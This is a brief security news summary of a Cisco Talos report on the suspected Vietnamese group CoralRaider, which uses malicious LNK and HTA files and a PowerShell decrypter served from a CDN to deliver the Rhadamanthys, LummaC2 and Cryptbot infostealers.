BleepingComputer reports that U.S., Germany, Japan, and UK systems have been subjected to ongoing attacks by suspected Vietnamese hacking group CoralRaider leveraging a content delivery network cache to facilitate the deployment of information-stealing payloads.
Intrusions commence with the delivery of an archive with a malicious .LNK file, which when opened runs an HTML Application file retrieved from a CDN platform subdomain to avert detection, according to a Cisco Talos report. Such an HTA file would enable the execution of a PowerShell decrypter script meant to evade Windows Defender before deploying the Rhadamanthys, LummaC2, or Cryptbot infostealers.
Further examination revealed CoralRaider's utilization of newer iterations of the Rhadamanthys and LummaC2 malware, as well as an enhanced version of Cryptbot with more comprehensive targets aside from improved anti-analysis and obfuscation techniques. Attacks part of the campaign have been associated with CoralRaider due to the presence of tactics, techniques, and procedures observed in the group's previous attacks.